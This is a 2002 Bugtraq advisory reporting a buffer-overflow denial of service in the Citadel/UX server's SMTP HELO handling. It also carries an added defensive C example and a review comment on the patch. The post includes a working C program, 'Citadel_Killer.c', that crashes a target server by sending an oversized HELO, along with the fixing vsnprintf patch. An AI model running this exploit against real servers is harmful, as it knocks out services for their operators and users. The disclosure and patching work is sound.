[24611] in bugtraq
Citadel/UX Server Remote DoS attack Vulnerability
daemon@ATHENA.MIT.EDU (xperc)
Mon Mar 11 14:31:14 2002
Date: 9 Mar 2002 23:10:15 -0000
Message-ID: <20020309231015.12129.qmail@mail.securityfocus.com>
From: xperc <xperc@hotmail.com>
To: bugtraq@securityfocus.com
What is Citadel/UX:
Citadel/UX is an advanced client/server BBS program
for operating highly interactive sites, both on the
Internet and over dialup. Users can connect to
Citadel/UX using any of telnet, WWW, or client
software. Among the features supported are public
and private message bases (rooms), electronic mail,
real-time chat, paging, etc. The server is
multithreaded and can easily support a large number
of concurrent users. In addition, SMTP and POP3
servers are built-in for easy connection to Internet
mail. Citadel/UX is both robust and mature, having
been developed over the course of the past twelve
years.
Problem:
I have found a buffer overflow in the Citadel/UX server.
An attacker can execute a denial of service attack
against it. Once the big buffer has been sent, the
server is vulnerable.
Example:
[xperc@security citadel]$telnet 192.168.0.3 25
Trying 192.168.0.3...
Connected to 192.168.0.3.
Escape character is '^]'.
220 security ESMTP Citadel/UX server ready.
helo [buffer]
[buffer] is around 4096 characters.
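Added example (not part of the original post and not Citadel/UX code): the session above sends a HELO line far beyond SMTP's base limit of 512 octets per command line, so a server can refuse it before any formatting takes place, and a bounded formatter can report truncation instead of overflowing. The names smtp_line_ok, format_log and build_helo are hypothetical, and the input is constructed.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define SMTP_LINE_MAX 512 /* RFC 5321 4.5.3.1.4: command line incl. CRLF */
#define LOG_BUF 4096      /* same size as a typical fixed log buffer */

/* Hypothetical input check: 0 = accept, -1 = reject with a 500 reply. */
int smtp_line_ok(const char *line, size_t len)
{
    if (len == 0 || len > SMTP_LINE_MAX)
        return -1;
    if (memchr(line, '\0', len) != NULL) /* embedded NUL hides trailing data */
        return -1;
    return 0;
}

/* Hypothetical bounded log formatter: 0 = fit, 1 = truncated, -1 = error. */
int format_log(char *out, size_t outsz, const char *format, ...)
{
    va_list ap;
    va_start(ap, format);
    int n = vsnprintf(out, outsz, format, ap); /* never writes past outsz */
    va_end(ap);
    if (n < 0)
        return -1;
    return (size_t)n >= outsz ? 1 : 0;
}

/* Constructed sample input: "helo " + arglen filler bytes + CRLF. */
size_t build_helo(char *dst, size_t dstsz, size_t arglen)
{
    if (dstsz < arglen + 8)
        return 0;
    memcpy(dst, "helo ", 5);
    memset(dst + 5, 'a', arglen);
    memcpy(dst + 5 + arglen, "\r\n", 3); /* copies the terminating NUL too */
    return arglen + 7;
}

int main(void)
{
    static char line[8192];
    char logbuf[LOG_BUF];
    size_t len = build_helo(line, sizeof line, 4096);
    printf("accept=%d truncated=%d\n", smtp_line_ok(line, len),
           format_log(logbuf, sizeof logbuf, "SMTP: %s", line));
    return 0;
}
```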
/* Citadel_Killer.c
 *
 * Remote Denial of Service Citadel/UX Server.
 *
 * by xperc@hotmail.com
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define MAXBUF 8000
#define MAXBUF2 (MAXBUF+7)   /* "helo " + MAXBUF + "\n" + NUL */
#define RECVBUF 256
#define CIT_SMTP 25
int main(int argc, char *argv[])
{
    int sockfd;
    char msg[RECVBUF],buf[MAXBUF+1],sendbuf[MAXBUF2];
    struct sockaddr_in target;
    if(argc!=2){
        fprintf(stderr,"Usage: %s target_address\n",*argv);
        exit(-1);
    }
    if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0){
        perror("socket");
        exit(-1);
    }
    memset(&target,0,sizeof(target));
    target.sin_family=AF_INET;
    target.sin_port=htons(CIT_SMTP);
    target.sin_addr.s_addr=inet_addr(argv[1]);
    if(connect(sockfd,(struct sockaddr*)&target,sizeof(target))<0){
        perror("connect");
        exit(-1);
    }
    /* read the 220 greeting */
    if(recv(sockfd,msg,sizeof(msg)-1,0)<=0){
        perror("recv");
        exit(-1);
    }
    memset(buf,'a',MAXBUF);
    buf[MAXBUF]='\0';   /* terminate before using buf with %s */
    snprintf(sendbuf,sizeof(sendbuf),"helo %s",buf);
    strcat(sendbuf,"\n");
    send(sockfd,sendbuf,strlen(sendbuf),0);
    close(sockfd);
    return 0;
}
Patch for this Vulnerability:
--- citadel-old/sysdep.c Sat Dec 8 12:31:44
2001
+++ citadel/sysdep.c Sat Mar 9 05:51:11
2002
@@ -106,7 +106,7 @@
char buf[4096];
va_start(arg_ptr, format);
- vsprintf(buf, format, arg_ptr);
+ vsnprintf(buf, sizeof(buf), format, arg_ptr);
va_end(arg_ptr);
if (loglevel <= verbosity) {
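Review bot: the return value of vsnprintf() is discarded on the changed line, so a formatted message longer than sizeof(buf) - 1 (4095 bytes) is now cut off without any trace in the log. Consider capturing the return value and, when it is negative or >= sizeof(buf), appending a truncation marker before the `if (loglevel <= verbosity)` test. The hunk also bounds only this one formatting call; nothing in the visible lines limits the length of the data callers pass in, so the input path deserves its own length check.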